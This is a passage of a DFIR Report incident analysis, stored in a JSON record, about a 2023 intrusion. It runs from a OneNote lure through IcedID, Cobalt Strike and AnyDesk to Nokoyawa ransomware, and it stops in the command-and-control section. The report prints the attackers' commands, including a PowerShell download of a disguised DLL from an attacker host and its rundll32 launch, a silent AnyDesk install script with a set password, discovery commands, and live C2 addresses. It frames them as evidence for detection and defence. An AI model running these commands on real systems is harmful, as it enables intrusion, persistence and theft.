{
	"id": "b32fc979-3909-4c80-af52-cb2c880c27db",
	"created_at": "2026-04-06T00:07:58.475284Z",
	"updated_at": "2026-04-10T13:12:12.273045Z",
	"deleted_at": null,
	"sha1_hash": "051a69981cfdec4db89081a317572b13207fe85a",
	"title": "From OneNote to RansomNote: An Ice Cold Intrusion",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 8400653,
	"plain_text": "From OneNote to RansomNote: An Ice Cold Intrusion\r\nBy editor\r\nPublished: 2024-04-01 · Archived: 2026-04-05 22:41:32 UTC\r\nKey Takeaways\r\nIn late February 2023, threat actors rode a wave of initial access using Microsoft OneNote files. In this\r\ncase, we observed a threat actor deliver IcedID using this method.\r\nAfter loading IcedID and establishing persistence, there were no further actions, other than beaconing for\r\nover 30 days.\r\nThe threat actor used Cobalt Strike and AnyDesk to target a file server and a backup server.\r\nThe threat actor used FileZilla to exfiltrate data from the network before deploying Nokoyawa\r\nransomware.\r\nAn audio version of this report can be found on Spotify, Apple, YouTube, Audible, \u0026 Amazon.\r\nPlease consider leaving feedback on this report here.\r\nServices\r\nWe provide a range of services, one of which is our Threat Feed, specializing in monitoring Command and\r\nControl frameworks like Cobalt Strike, Metasploit, Sliver, Viper, Mythic, Havoc, Meterpreter, and more. For\r\nexample, the Cobalt Strike server in this case was detected weeks before this intrusion started.\r\nAnother service we provide is Private Threat Briefs, which encompasses over 25 private reports annually. These\r\nreports follow a format similar to our public reports but are more concise in nature. In contrast to our public\r\nreports, these briefs are typically released shortly after an intrusion, sometimes even while the intrusion is still\r\nongoing.\r\nOur comprehensive “All Intel” service includes the Threat Feed, Private Threat Briefs, exploit events, long-term\r\ninfrastructure tracking, clustering, Cobalt Strike configurations, C2 domains, and a curated collection of\r\nintelligence, which includes non-public case data.\r\nOur Private Sigma Ruleset is exclusively curated using insights derived from Private Threat Briefs and internal\r\ncases, focusing on Sigma rules. 
As of January 2024, it encompasses approximately 100 Sigma rules, created from\r\nthe knowledge of 40+ distinct cases. Each rule is mapped to ATT\u0026CK and accompanied by a test example.\r\nContact us for a demo or free trial today!\r\nTable of Contents:\r\nCase Summary\r\nhttps://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\r\nPage 1 of 40\n\nAnalysts\r\nInitial Access\r\nExecution\r\nPersistence\r\nPrivilege Escalation\r\nDefense Evasion\r\nCredential Access\r\nDiscovery\r\nLateral Movement\r\nCollection\r\nCommand and Control\r\nExfiltration\r\nImpact\r\nTimeline\r\nDiamond Model\r\nIndicators\r\nDetections\r\nMITRE ATT\u0026CK\r\nCase Summary\r\nThis intrusion started in late February of 2023 and lasted through late March of 2023. The threat actor initially\r\ngained access through a phishing campaign, in which they distributed emails containing malicious OneNote\r\nattachments. During this period, OneNote files had surged in popularity among initial access brokers. This rise\r\nwas primarily due to their capability to circumvent email attachment blocking rules and evade detection by\r\nexisting security mechanisms.\r\nUpon opening the malicious OneNote file and engaging with it, the file triggered the execution of a cmd file. This,\r\nin turn, launched PowerShell to facilitate the download of an IcedID DLL from a remote server. To evade\r\ndetection, this DLL was disguised using various image file extensions. Following the execution of the downloaded\r\nDLL, a scheduled task was established to maintain persistence within the system. Notably, unlike prior IcedID\r\ninfections, no discovery actions were observed at this time.\r\nFor the next 21 days, activity was limited to command and control beaconing with no other actions detected. 
On\r\nday 22, the standard IcedID discovery, using Microsoft tools like: net, nltest, chcp, and systeminfo, was observed.\r\nBeyond this, no further activity was noted.\r\nOn day 33 of the intrusion, the IcedID malware launched several Cobalt Strike beacons. These beacons, once\r\nactive on the beachhead host, injected into numerous processes and initiated an Active Directory discovery\r\noperation. This operation used a batch script to execute a series of AdFind commands. Next, a PowerShell script\r\nwas deployed to install AnyDesk. Following the installation, another batch script ran to relay the newly generated\r\nAnyDesk ID back to the threat actor.\r\nhttps://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\r\nPage 2 of 40\n\nThe threat actor then connected to the host using AnyDesk and began browsing files. The account they were\r\nlogged in as had elevated privileges, since the original user, who inadvertently activated the malware, was a\r\nmember of the domain administrators group. Leveraging this access, they accessed LSASS on the host and\r\nproceeded with additional reconnaissance activities. These actions encompassed both command line queries, such\r\nas net, whoami, and route, as well as GUI based tools through the AnyDesk connection, including the use of Task\r\nManager and the deployment of SoftPerfect Network Scanner (aka NetScan).\r\nAfter getting a list of hosts, the threat actor created a batch file to run nslookup for all the identified hosts. While\r\nthat was running, the threat actor browsed file shares, looking at various documents including password related\r\ndocuments. The threat actor then created a second batch script to run nslookup, this time targeting Windows\r\nservers specifically. 
Shortly after running this, the threat actor initiated their first lateral movement action, using\r\nRDP to connect to a backup server from their beachhead host.\r\nOn the backup server, they used Internet Explorer to download a Cobalt Strike beacon and then they executed it.\r\nUtilizing this beacon, they proceeded to deploy and execute an AnyDesk installer package, identical to the one\r\nobserved on the initial compromised host. Next, they pivoted to a file server and performed the same actions. On\r\nthe file server, they continued to review documents, including insurance related files.\r\nThe threat actor then opened Internet Explorer on the file server and proceeded to download FileZilla. Utilizing\r\nthe FileZilla client, they established a SFTP connection to a remote server, initiating the data exfiltration process.\r\nThis marked the beginning of a prolonged data exfiltration operation that spanned several hours. Apart from the\r\nongoing data transfers, activity significantly decreased until it resumed the following day.\r\nApproximately 18 hours after the initiation of the data exfiltration process, the threat actor deemed the activity\r\ncomplete and progressed to the next phase of their attack. They conducted another network scan utilizing NetScan.\r\nRoughly two and a half hours post-scan, they initiated the preparation for a ransomware delivery. Leveraging their\r\nAnyDesk connection on the file server, they reviewed both the Task Manager and the Local Group Policy\r\nManager, before dropping a ransomware file on the host. Following this, they executed a batch script designed to\r\nlaunch the ransomware.\r\nFollowing the execution of ransomware on the file server, the threat actor re-established their connection to the\r\nbackup server, conducting similar checks via Task Manager and Local Group Policy Manager before dropping the\r\nransomware file. 
Next, they introduced and executed IOBit’s Unlocker utility, a move likely aimed at\r\ncircumventing file locks imposed by the backup software. After using this tool, they followed the same batch\r\nscript execution on this server as previously observed. After execution, they dropped and ran ProcessHacker and\r\nthen proceeded to open the batch file in notepad++ before re-running the script and ransomware.\r\nApproximately two hours after the initiation of the ransomware on the file server, the threat actor revisited the\r\nsystem through their AnyDesk connection. In this return visit, they uninstalled FileZilla, signaling a move to cover\r\ntheir tracks. Next, they re-executed the ransomware on the host, and then opened the ransom note on the server’s\r\ndesktop, verifying their objective was complete.\r\nFollowing this action, no further activities were detected from the threat actor regarding the ransomware\r\ndeployment, indicating a strategic decision to limit the attack’s scope to these two critical servers rather than\r\nhttps://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\r\nPage 3 of 40\n\nextending it across the entire network. From initial access to ransomware execution, we observed a Time to\r\nRansomware (TTR) of 812 hours, just over 34 calendar days.\r\nOne interesting thing to note about the command and control domain for Cobalt Strike is it was seized by\r\nMicrosoft, Fortra and Health-ISAC a few weeks after this intrusion. 
On April 6, 2023, the command and control\r\ndomain changed DNS to Microsoft with a domain registration name of Digital Crimes Unit.\r\nPlease consider leaving feedback on this report here.\r\nAnalysts\r\nAnalysis and reporting completed by @iiamaleks, @IrishD34TH, and @Miixxedup\r\nInitial Access\r\nA widespread malicious email campaign that broadly targeted many companies in unrelated industries blasted\r\ngeneric lures with an attached OneNote file claiming to contain an unspecified “secure message.” The campaign\r\nwas documented in open-source threat intelligence by pr0xylife on their GitHub repository. The campaign ID used\r\nby threat actor was 3329953471, embedded in the configuration data in the IcedID DLL payload.\r\nAccording to Proofpoint Threat Research, the campaign was not very large in message volume compared to other\r\ncampaigns, with fewer than one thousand messages observed over two days, broadly targeting companies across\r\nManufacturing, Technology, Energy, Retail, Insurance, and several other sectors. The threat actor behind the\r\ncampaign used techniques similar to two tracked threat actors but did not provide enough unique attributes to\r\nstrongly attribute the campaign to either one of them.\r\nThe OneNote file used to gain initial access in this case was not very sophisticated. A Windows batch file named\r\n“O p e n.cmd” was hidden behind a large button marked “Open” in the OneNote file with a blurred image of a\r\ndocument in the background and simple instructions in the foreground to double click the button.\r\nhttps://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\r\nPage 4 of 40\n\nExecution\r\nThe initial execution through the OneNote lure required the person who received the email attachment to open the\r\nOneNote file. 
After clicking through the warning prompt, the O p e n.cmd file executed PowerShell to download\r\nan IcedID DLL named as if it were a JPG file, then used rundll32 to execute the DLL, which immediately\r\nconnected to command and control servers, checked in and started beaconing over unencrypted HTTP, triggering\r\nan Emerging Threats Open rule: ET MALWARE Win32/IcedID Request Cookie.\r\nThe earliest indicators that something suspicious occurred were the Sysmon events File Created (Event ID 11)\r\nand File Stream Created (Event ID 15), which showed a .cmd file with the Mark of the Web being created by OneNote:\r\nThe metadata of the O p e n.cmd batch file can be found on VirusTotal, and the contents are shown below. It is a\r\nvery simple batch script that uses basic obfuscation, yet still presents some easy detection opportunities in its\r\nbehavior:\r\nAfter de-obfuscating the batch file (or by observing the child processes created during dynamic analysis), the\r\npurpose of the script becomes clear.\r\npowershell invoke-webrequest -uri http://mrassociattes.com/images/62.gif -outfile c:\\programdata\\COIm\r\nIt uses PowerShell to download a payload file from a URL. The remote server request makes it look like a\r\nGIF image is being downloaded. The file is dropped to C:\\programdata\\ using a filename that looks like a\r\nJPEG image. The real file type is actually a DLL:\r\nThe file was then run using rundll32.\r\nrundll32 c:\\programdata\\COIm.jpg,init\r\nSomewhat surprisingly, more than a month after initial access in the intrusion, after the threat actor had started\r\ninteracting with the compromised machine using AnyDesk, they opened the OneNote file and double-clicked the\r\nOpen button to launch IcedID again. 
We are unsure of the motivation of this action, but this represented another\r\nchance for defenders to respond if detections were in place.\r\nhttps://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\r\nPage 6 of 40\n\nExecution of Cobalt Strike Beacon\r\nOn the 33rd day of the intrusion, the IcedID malware was observed dropping several files.\r\nThese files were Cobalt Strike beacons, which were then executed via the IcedID malware. IcedID was running in\r\nrundll32.exe, which launched a DLL version of Cobalt Strike beacon from the user’s AppData\\Local\\Temp\r\ndirectory using regsvr32.exe. The IcedID rundll32.exe process also launched an EXE version of a beacon named\r\n“Funa2.exe” from the same Temp directory.\r\nDuring lateral movement activity, the threat actors deployed the same executable Cobalt Strike beacon as seen on\r\nthe beachhead host. This time, they used the name csrss.exe and executed these using the RDP session. The files\r\nwere downloaded onto the lateral hosts using Internet Explorer, then executed by clicking directly from the\r\nInternet Explorer download prompt or by double-clicking in File Explorer window.\r\nThroughout the later stages of the intrusion the Cobalt Strike beacons used various named pipes.\r\nhttps://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\r\nPage 7 of 40\n\nOne of the many effective ways to detect Cobalt Strike beacon in this intrusion was through the named pipes it\r\ncreated, which used the default naming patterns. 
These pipe creation events were observed with Sysmon.\r\nA DLL version of the Cobalt Strike beacon was dropped on the beachhead host in the Local AppData Temp\r\ndirectory and executed with RegSvr32.exe, but that process did not create any named pipes.\r\nThe default Cobalt Strike pipes are (the “*” symbolize the prefix/suffix):\r\n\\postex_*\r\n\\postex_ssh_*\r\n\\status_*\r\n\\msagent_*\r\n\\MSSE-*\r\n\\*-server\r\nMore strategies for detecting Cobalt Strike can be found in Cobalt Strike, a Defender’s Guide part 1 and part 2. \r\nPersistence\r\nDuring the initial execution of IcedID, the following two files were created under the AppData Roaming folder of\r\nthe user that executed it:\r\nCadiak.dll: IcedID first stage.\r\nlicense.dat: Encoded version of the second stage, which gets loaded into memory by the first stage.\r\nA scheduled task was created that contained instructions for executing the IcedID DLL and the location of the\r\nlicense.dat file. This is a very common method that IcedID uses for persistence.\r\n\u003c?xml version=\"1.0\" encoding=\"UTF-16\"?\u003e\r\n\u003cTask version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\"\u003e\r\n \u003cRegistrationInfo\u003e\r\n \u003cURI\u003e\\azigci_{C747FFDF-F0E2-113B-8DCA-0ECA4EBB92A2}\u003c/URI\u003e\r\n \u003c/RegistrationInfo\u003e\r\n \u003cTriggers\u003e\r\nhttps://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\r\nPage 8 of 40\n\n\u003cLogonTrigger id=\"LogonTrigger\"\u003e\r\n \u003cEnabled\u003etrue\u003c/Enabled\u003e\r\n \u003cUserId\u003e[REDACTED]\u003c/UserId\u003e\r\n \u003c/LogonTrigger\u003e\r\n \u003c/Triggers\u003e\r\n \u003cPrincipals\u003e\r\n \u003cPrincipal id=\"Author\"\u003e\r\n \u003cRunLevel\u003eHighestAvailable\u003c/RunLevel\u003e\r\n \u003cUserId\u003e[REDACTED]\u003c/UserId\u003e\r\n \u003cLogonType\u003eInteractiveToken\u003c/LogonType\u003e\r\n \u003c/Principal\u003e\r\n \u003c/Principals\u003e\r\n 
\u003cSettings\u003e\r\n \u003cMultipleInstancesPolicy\u003eIgnoreNew\u003c/MultipleInstancesPolicy\u003e\r\n \u003cDisallowStartIfOnBatteries\u003efalse\u003c/DisallowStartIfOnBatteries\u003e\r\n \u003cStopIfGoingOnBatteries\u003efalse\u003c/StopIfGoingOnBatteries\u003e\r\n \u003cAllowHardTerminate\u003efalse\u003c/AllowHardTerminate\u003e\r\n \u003cStartWhenAvailable\u003etrue\u003c/StartWhenAvailable\u003e\r\n \u003cRunOnlyIfNetworkAvailable\u003efalse\u003c/RunOnlyIfNetworkAvailable\u003e\r\n \u003cIdleSettings\u003e\r\n \u003cDuration\u003ePT10M\u003c/Duration\u003e\r\n \u003cWaitTimeout\u003ePT1H\u003c/WaitTimeout\u003e\r\n \u003cStopOnIdleEnd\u003etrue\u003c/StopOnIdleEnd\u003e\r\n \u003cRestartOnIdle\u003efalse\u003c/RestartOnIdle\u003e\r\n \u003c/IdleSettings\u003e\r\n \u003cAllowStartOnDemand\u003etrue\u003c/AllowStartOnDemand\u003e\r\n \u003cEnabled\u003etrue\u003c/Enabled\u003e\r\n \u003cHidden\u003efalse\u003c/Hidden\u003e\r\n \u003cRunOnlyIfIdle\u003efalse\u003c/RunOnlyIfIdle\u003e\r\n \u003cWakeToRun\u003efalse\u003c/WakeToRun\u003e\r\n \u003cExecutionTimeLimit\u003ePT0S\u003c/ExecutionTimeLimit\u003e\r\n \u003cPriority\u003e7\u003c/Priority\u003e\r\n \u003c/Settings\u003e\r\n \u003cActions Context=\"Author\"\u003e\r\n \u003cExec\u003e\r\n \u003cCommand\u003erundll32.exe\u003c/Command\u003e\r\n \u003cArguments\u003e\"C:\\Users\\[REDACTED]\\AppData\\Roaming\\[REDACTED]\\Cadiak.dll\",init --od=\"DeskBlouse\\li\r\n \u003c/Exec\u003e\r\n \u003c/Actions\u003e\r\n\u003c/Task\u003e\r\nThe scheduled task was configured to execute at logon under the user that initially executed the IcedID payload.\r\nLater in the intrusion, AnyDesk was installed with a command line option that established persistence, running\r\nwhen Windows starts by creating a Service:\r\nhttps://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\r\nPage 9 of 40\n\nC:\\ProgramData\\AnyDesk.exe --install C:\\ProgramData\\Any --start-with-win --silent\r\nDuring the 
deployment of AnyDesk, a service creation event was generated under the System channel:\r\nAlerting on every service creation is usually far too noisy for any meaningful review by security operations\r\npersonnel, but it can be very helpful to alert on specific patterns of remote monitoring and management (RMM)\r\ninstallation artifacts. There are many approaches for detecting RMM tools through resilient patterns of file paths\r\nor digital signatures. These legitimate tools may not trigger alerts in endpoint detection products by default, so it is\r\nimportant for security teams to create custom detections. As seen in various previous cases here at The DFIR\r\nReport, and also on other platforms, RMM tools provide a very easy way to get access to systems with interactive\r\ncapabilities.\r\nPrivilege Escalation\r\nThe user account that opened the initial OneNote lure file was in the domain administrators security group.\r\nUsually, threat actors have to work to escalate to a domain admin from an unprivileged user account, but in this\r\ncase, it was a given. This is an example of why it is a best practice for domain administrators to use separate\r\naccounts and a privileged workstation to perform administrative functions, while using a non-privileged user\r\naccount to check email, browse the web, and open files from unknown sources when necessary.\r\nDefense Evasion\r\nMasquerading\r\nhttps://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\r\nPage 10 of 40\n\nOne of the simpler ways that IcedID attempted to evade detection was by naming the malware DLL file as\r\nCOIm.jpg. 
Renaming a DLL file extension to a commonly ignored graphics file type, such as jpg, gif, or png, is a\r\nsimple example of Masquerading, MITRE Technique T1036.008, and represents an excellent opportunity for a\r\ncustom detection.\r\nThe threat actor was observed using common Windows process names for other tooling used during the intrusion,\r\nincluding:\r\ncsrss.exe for a Cobalt Strike beacon downloaded from 91.215.85[.]183/download/csrss.exe\r\nsvchost.exe for the ransomware payload deployed to systems.\r\nProcess Injection\r\nUpon execution of a Cobalt Strike beacon, process injection into a svchost.exe process was observed. In this\r\ncase, process injection was conducted by writing into a remote process and executing the code via a remote thread.\r\nsvchost.exe was subsequently observed executing multiple different commands related to discovery and\r\nenumeration.\r\nSince the discovery commands involved executing scripts via cmd.exe , the anomalous parent child relationship\r\nbetween svchost.exe and cmd.exe was observed on the system from a memory dump.\r\nhttps://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\r\nPage 11 of 40\n\nIndicator Removal\r\nFileZilla, installed by the threat actors for exfiltration activity, was observed being manually uninstalled by the\r\nthreat actors during the final ransomware deployment period.\r\nCredential Access\r\nThe threat actors extracted credentials from LSASS during the intrusion. The process started with a Cobalt Strike\r\nbeacon process starting a new rundll32.exe child process, with no command line arguments, as SYSTEM. It is\r\nunusual for rundll32 to be executed without any command line, but it is a common pattern for Cobalt Strike\r\nbeacon injection target processes. This makes a useful detection pattern. 
The rundll32 process also created a\r\nnamed pipe (Sysmon Event ID 17) with a pipe name that started with “\\postex_” which is another well-known\r\nCobalt Strike beacon artifact that can be detected. The newly spawned rundll32 process accessed the lsass.exe\r\nprocess, and then created a remote thread in lsass.exe. These events were recorded by Sysmon event IDs 8 and 10.\r\nEvent ID 10 had the following relevant fields, which may be useful for threat hunting or incident response:\r\nProcess accessed:\r\nSourceImage: C:\\Windows\\system32\\rundll32.exe\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+9d1e4|C:\\Windows\\System32\\KERNELBASE.dll+2bcbe|UNKNOWN(00000\r\nTargetUser: NT AUTHORITY\\SYSTEM\r\nEvent ID 8 had the following relevant fields:\r\nCreateRemoteThread detected:\r\nSourceImage: C:\\Windows\\System32\\rundll32.exe\r\nTargetImage: C:\\Windows\\System32\\lsass.exe\r\nhttps://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\r\nPage 12 of 40\n\nStartModule: -\r\nStartFunction: -\r\nTargetUser: NT AUTHORITY\\SYSTEM\r\nAfter accessing and injecting into LSASS, the threat actors began using another domain administrator account\r\nindicating successful credential access.\r\nDuring file share browsing activity by the threat actors, we observed them finding and opening a document related\r\nto passwords for the environment.\r\nDiscovery\r\nIcedID Discovery\r\nIcedID was observed executing multiple discovery commands originating from rundll32.exe on the beachhead.\r\nWMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get * /Format:List\r\nipconfig /all\r\nsysteminfo\r\nnet config workstation\r\nnltest /domain_trusts\r\nnltest /domain_trusts /all_trusts\r\nnet view /all /domain\r\nnet view /all\r\nnet group \"Domain Admins\" /domain\r\nThese host profiling commands in this order are typically seen from IcedID bots, and reverse 
engineering the\r\nIcedID binary shows that they are hard-coded (in encrypted strings) to be run when the bot receives a specific\r\ncommand from its command and control server. A published IcedID analysis report from Binary Defense\r\ndescribes the same commands observed, and a report from Walmart Global Tech details the algorithm to decrypt\r\nthe command strings. In different IcedID samples, the commands may appear in a different order, but all versions\r\ncontain nearly the same list of profiling commands. While alerting on any one of these commands by itself might\r\nresult in too many false-positive alerts for security operations, a useful technique is to set up alerts when more\r\nthan three or four of these commands are seen in a short time period on the same host. If the parent process is\r\nrundll32, regsvr32, or another high-risk process, the severity of the alert may be elevated.\r\nActive Directory Enumeration\r\nAn AD.bat batch script and AdFind.exe were dropped onto the beachhead host from a process injected\r\nsvchost.exe process.\r\nhttps://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\r\nPage 13 of 40\n\nThe AD.bat script was subsequently executed, which initiated discovery of Active Directory via ADFind.\r\nadfind.exe -gcb -sc trustdmp\r\nadfind.exe -f \"(objectcategory=group)\"\r\nadfind.exe -subnets -f (objectCategory=subnet)\r\nadfind.exe -f (objectcategory=organizationalUnit)\r\nadfind.exe -f objectcategory=computer -csv name operatingSystem\r\nadfind.exe -f objectcategory=computer\r\nadfind.exe -f (objectcategory=person)\r\nC:\\Windows\\system32\\cmd.exe /c dir /s /b C:\\Windows\\system32\\*htable.xsl\r\nNslookup Discovery\r\nAn injected process svchost.exe was observed dropping a ns.bat Batch script.\r\nExecution of ns.bat initiated the execution of nslookup commands that attempted to resolve multiple desktop\r\nand server 
hostnames.\r\nhttps://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\r\nPage 14 of 40\n\nLater, a second nsser.bat script was observed executing multiple nslookup commands.\r\nPort Scanning\r\nSoftPerfect Network Scanner was used by the threat actor on multiple different systems under different\r\ndirectories.\r\nNetScan was seen connecting to multiple ports, on multiple different IP addresses–an activity indicative of port\r\nscanning.\r\nhttps://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\r\nPage 15 of 40\n\nThe following summarizes a list of ports that were scanned using NetScan.\r\nPort Purpose\r\n53 DNS\r\n80 HTTP\r\n88 Kerberos\r\n111 NFS, NIS, or any rpc-based service\r\n135 Remote Procedure Call\r\n137 NetBIOS\r\n161 SNMP\r\n389 LDAP\r\n443 HTTPS\r\n445 SMB\r\n464 Used by the Kerberos authentication system\r\n2049 NFS\r\n3389 RDP\r\n5353 Multicast DNS (mDNS) and DNS-SD\r\nHands on Discovery\r\nDuring RDP sessions the threat actors were also observed opening Task Manager multiple times via the Start\r\nMenu, as indicated by the /7 flag.\r\nhttps://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\r\nPage 16 of 40\n\nOther commands were observed being executed manually by the threat actors, either from Cobalt Strike beacons\r\nor in Windows cmd shells opened via the interactive AnyDesk or RDP sessions. Commands included:\r\nC:\\Windows\\system32\\cmd.exe /C net group \"domain Admins\" /domain\r\nroute print\r\nwhoami\r\nLateral Movement\r\nRDP was used by the threat actors to move laterally from the beachhead to other servers in the environment. 
After\r\nconnecting to each server with RDP, the threat actors took steps to deploy a Cobalt Strike beacon, as well as\r\nAnyDesk, on the system.\r\nThe Cobalt Strike payload was downloaded from 91.215.85[.]183/download/csrss.exe via Internet Explorer.\r\nThe payload was then launched multiple times from the Downloads folder and also copied and executed from the\r\nWindows temporary folder.\r\nIn addition, the INSTALL.ps1 script was dropped and executed by the Cobalt Strike beacon.\r\nCollection\r\nAlthough the threat actors spent significant time in the environment, their interest appeared to focus on certain\r\ndocuments. A concrete example: directly after the threat actors accessed the file server with AnyDesk, they used\r\nnotepad++ to open a file related to the insurance policy of this victim.\r\nOn the beachhead workstation, files were opened with their ‘preferred’ application: Word for .docx, Excel for .xlsx and\r\nInternet Explorer for .pdf.\r\nWhile it is not always easy to get a full list of files a threat actor specifically accessed, this time it was logged\r\nwell in process activity.\r\nOn other machines, there was apparent interest in certain files, mainly related to possible passwords, PII and other\r\nfinancial data.\r\nCommand and Control\r\nThe threat actors used three different ways to access the hosts within this network:\r\nIcedID\r\nCobalt Strike\r\nAnyDesk\r\nBelow is an overview of each of the stages found during the intrusion.\r\nIcedID\r\nIcedID uses multiple staged domains to deliver parts of its functionality. The IcedID DLL running in the rundll32\r\nprocess immediately connected to its command and control server on port 80, using domain name\r\naerilaponawki[.]com, which resolved at the time to 193.149.129.131. 
The contents of this network connection\r\nmatched a malware rule in the free Emerging Threats Open ruleset: ET MALWARE Win32/IcedID Request\r\nCookie.\r\nThe IcedID process also connected to two other command and control servers by domain name, but both of these\r\nconnections used TLS over port 443, so it was not possible for the network sensor to observe as much content or\r\nmatch as many network detection rules as it would have with TLS termination or unencrypted traffic. The\r\nconnection to klindriverfor[.]com (5.255.102.167) on port 443 repeated about once every 10 minutes for 12 days.\r\nThe connection to alishaskainz[.]com (45.61.139.206) on port 443 also repeated about once every 10 minutes for\r\n28 days.\r\nThe table below gives an overview of each domain and its function:\r\nIP               Port  Domain               Usage                                ISP                       Location\r\n193.149.129.131  80    aerilaponawki[.]com  First callout and primary C2 IcedID  BLNWX                     NL\r\n5.255.102.167    443   klindriverfor[.]com  Additional C2 IcedID                 The Infrastructure Group  NL\r\n45.61.139.206    443   alishaskainz[.]com   Additional C2 IcedID                 BL Networks               GB\r\n5.255.105.55     443   halicopnow[.]com     Additional C2 IcedID                 The Infrastructure Group  NL\r\nFor each of the domains, the relevant rules that can be used (in combination) to look for IcedID\r\nbehavior are:\r\naerilaponawki[.]com:\r\nET MALWARE Win32/IcedID Request Cookie\r\nklindriverfor[.]com:\r\nET POLICY OpenSSL Demo CA - Internet Widgits Pty (0)\r\nalishaskainz[.]com:\r\nET POLICY OpenSSL Demo CA - Internet Widgits Pty (0)\r\nhalicopnow[.]com:\r\nET POLICY OpenSSL Demo CA - Internet Widgits Pty (0)\r\nWhen looking for additional unusual network connections, two more were found in a memory dump\r\nof the compromised systems. 
The connection from rundll32.exe is especially interesting and is related to our\r\nIcedID infection. It appears to be a different IP for one of the previously found command and control domains.\r\nIP             Port  Domain              Usage                 ISP          Location\r\n162.33.178.40  443   alishaskainz[.]com  Additional C2 IcedID  BL Networks  GB\r\nCobalt Strike\r\nThe Cobalt Strike beacons that were used during the intrusion were named:\r\nagaloz.dll\r\nFuna2.exe / csrss.exe\r\nThey contain a configuration to contact the command and control server below:\r\nIP             Domain                 Usage             ISP           Location\r\n91.215.85.183  msc-mvc-updates[.]com  Cobalt Strike C2  Prospero OOO  RU\r\nSuricata reported hits for ‘Malleable’ profiles used by the Cobalt Strike beacon. These profiles are\r\npreconfigurable and are mostly used to ‘mimic’ known traffic of different applications, such as a\r\nmail client, chat client, or a JavaScript library. The rule that fired can be seen in the first screenshot\r\nbelow.\r\nThe second screenshot shows the actual configured portion of the profile, which appears very similar to this\r\n“gmail” profile. Communication goes via the URI:\r\n/_/scs/mail-static/_js/\r\nThe DFIR Report Threat Intel Team picked up this Cobalt Strike server on January 9th, 2023, weeks before the\r\nintrusion. 
On that day, the beacon profile resembled a freely available malleable C2 profile that mimics jquery.\r\nThe command and control server appears to have been in use through at least April 2024, with a different Cobalt\r\nStrike beacon reported to the Triage malware sandboxing service using the same gmail-like profile and remote IP\r\nas observed in this intrusion.\r\nWith that said, it appears Microsoft took over this domain on April 6, 2023, when DNS was switched from\r\nCloudflare to MICROSOFTINTERNETSAFETY.NET and the domain started resolving to 20.69.178.82\r\n(Microsoft).\r\nWe can see the registration information was updated (date showing last updated) as well.\r\nWe were also able to locate the complaint by Microsoft, Fortra and Health-ISAC to acquire this domain.\r\nHere’s an excerpt of the domain and registration information from the complaint.\r\nAccording to The DFIR Report’s Threat Intel Team, the IP was observed hosting Cobalt Strike through June 3,\r\n2023.\r\nAfter initial deployment, the threat actors downloaded additional beacons, all of which have a parent process of\r\nthe executable called Funa2.exe. 
It appears that the .dll likely didn’t work as expected, as five minutes later an\r\n.exe with the same name gets downloaded.\r\nDLL download attempt:\r\nChange to EXE download:\r\nShortly after, we find the first connection to the server using the malleable profile paths.\r\nAnyDesk\r\nDuring later stages of the intrusion, the threat actors deployed AnyDesk using a PowerShell script copied to\r\nC:\\ProgramData\\INSTALL.ps1. The copied PowerShell script was executed on multiple systems to facilitate the\r\ndeployment of AnyDesk using the following commands:\r\n mkdir \"C:\\ProgramData\\Any\"\r\n # Download AnyDesk\r\n $clnt = new-object System.Net.WebClient\r\n $url = \"http://download.anydesk.com/AnyDesk.exe\"\r\n $file = \"C:\\ProgramData\\AnyDesk.exe\"\r\n $clnt.DownloadFile($url,$file)\r\n cmd.exe /c C:\\ProgramData\\AnyDesk.exe --install C:\\ProgramData\\Any --start-with-win --silent\r\n cmd.exe /c echo btc1000qwe123 | C:\\ProgramData\\Any\\AnyDesk.exe --set-password\r\n #net user AD \"2020\" /add\r\n #net localgroup Administrators InnLine /ADD\r\n #reg add \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccount\r\nTwo details of this script matter for detection: the unattended-access password is piped into AnyDesk.exe\r\n--set-password on the command line, so it is visible in process creation telemetry (the AnyDesk Sigma rules\r\nlisted under Detections key on exactly this), and the commented-out net user, net localgroup and reg add lines\r\nare disabled left-overs from the template for adding an extra local administrator account.\r\nThis install script appears to be similar to the previously leaked PowerShell script used by Conti.\r\nAnyDesk can be used either as an installed service (as we can see above) or as a portable version. The\r\ndifferences and limitations are described on the official AnyDesk site. As we are dealing with the ‘installed’\r\nversion, it will leave certain artifacts related to the installed version on the system. 
